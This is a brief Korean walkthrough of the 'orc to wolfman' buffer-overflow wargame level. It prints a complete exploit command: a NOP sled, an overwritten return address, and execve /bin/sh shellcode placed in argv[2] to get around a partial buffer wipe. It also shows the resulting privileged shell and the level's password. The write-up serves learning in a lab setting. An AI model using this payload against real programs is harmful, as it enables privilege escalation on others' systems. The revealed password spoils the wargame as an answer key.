orc to wolfman

이번 판은 orc에 bufferhunter가 추가된 버전이다.

 

그럼 ret2libc 환경변수는 쓸수없고

bufferhunter를 보면 40까지만 memset시킨다.

그럼 이는 buffer에 쉘코드를 올리는 것을 막아주지만, argv[2]에 올려버리면 우회할수 있다.

 

payload는 orc때 사용한 그대로를 하면 되겠다.

 

공격!

[orc@localhost orc]$ bash2

[orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x44,"\xff\xfd\xff\xbf"'` `perl -e 'print "\x90"x10000,"\x31\xc

0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?

풺ash$ id

uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)

bash$ my-pass

euid = 505

love eyuna